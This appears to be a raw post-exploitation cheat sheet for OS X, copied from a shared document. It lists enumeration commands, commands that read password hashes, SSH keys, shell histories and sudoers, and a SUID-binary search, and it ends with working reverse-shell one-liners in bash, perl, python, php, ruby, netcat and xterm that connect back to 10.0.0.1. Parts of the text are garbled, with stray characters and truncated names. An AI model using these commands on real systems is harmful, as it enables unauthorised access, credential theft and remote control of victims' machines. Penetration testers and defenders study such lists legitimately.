OS X Google Doc Content #

OS X Google Doc Content

The content below is the raw data from the Google Doc that was first used to collect it. Over time, this content will be moved into sub-pages and organized but is placed here, now, so as to be more complete. We apologize for its appearance.


Blind Files

(things to pull when all you can do is blindly read) LFI/dir traversal /etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)

System

uname -a ps aux ps -aef id arch w who -a gcc -v mysql --version perl -v ruby -v python --version df -k mount last -a lastlogin (*bsd) getenforce <- does not work on Lion no idea if this work in previous versions dmesg lsusb<- does not work on Lion no idea it this work on previous versions lshw <- does not work on Lion no idea it this work on previous versions free -m <- does not work on Lion no idea it this work on previous versions du -h --max-depth=1 / which nmap (see if it's already installed) locate bin/nmap which nc (see if it's already installed) locate bin/ whoami jps -l java -version</code>

Networking

hostname -f ip addr show ifconfig -a route -n cat /etc/network/interfaces iptables -L -n netstat -anop netstat -r netstat -nltupw (root with raw sockets) arp -a lsof -nPi

Configs

ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null cat /etc/issue{,.net} cat /etc/passwd cat /etc/shadow (gotta try..) cat /etc/shadow~ # (sometimes there when edited with gedit) cat /etc/master.passwd cat /etc/group cat /etc/hosts cat /etc/crontab cat /etc/sysctl.conf for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons) cat /etc/resolv.conf cat /etc/samba/smb.conf pdbedit -L -w pdbedit -L -v cat /etc/exports cat /etc/auto.master cat /etc/auto_maste cat /etc/fstab cat /etc/exports find /etc/sysconfig/ -type f -exec cat {} \; cat /etc/sudoers

Package Sources

cat /etc/apt/sources.list ls -l /etc/yum.repos.d/ cat /etc/yum.conf

Finding Important Files

find /var/log -type f -exec ls -la {} \; ls -alhtr /mnt ls -alhtr /Volumes ls -alhtr /tmp ls -alhtr /home ls /Users/*/.ssh/* find /home -type f -iname '.*history' ls -lart /etc/rc.d/ locate tar | grep [.]tar$ locate tgz | grep [.]tgz$ locate sql l grep [.]sql$ locate settings | grep [.]php$ locate config.inc | grep [.]php$ ls /Users/*/id* locate .properties | grep [.]properties # java config files locate .xml | grep [.]xml # java/.net config files find /sbin /usr/sbin /opt /lib `echo $PATH | 'sed s/:/ /g'` -perm -4000 # find suids

Per User

ls -alh /Users/*/ ls -alh /Users/*/.ssh/ cat /Users/*/.ssh/authorized_keys cat /Users/*/.ssh/known_hosts cat /Users/*/.*hist* find -type f /Users/*/.vnc /Users/*/.subversion grep ^ssh /Users/*/.*hist* grep ^telnet `/Users/*/.*hist* grep ^mysql /Users/*/.*hist* cat /Users/*/.viminfo sudo -l # if sudoers is not readable, this sometimes works per user crontab -l

Priv (sudo’d or as root)

ls -alh /root/ cat /etc/sudoers cat /etc/shadow cat /etc/master.passwd # OpenBSD cat /var/spool/cron/crontabs/* lsof -nPi ls /Users/*/.ssh/*

Reverse Shell

starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # No /dev/tcp on Mac OS X perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore rm /tmp/;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f xterm -display 10.0.0.1:1 Listener- Xnest :1 Add permission to connect- xhost +victimIPf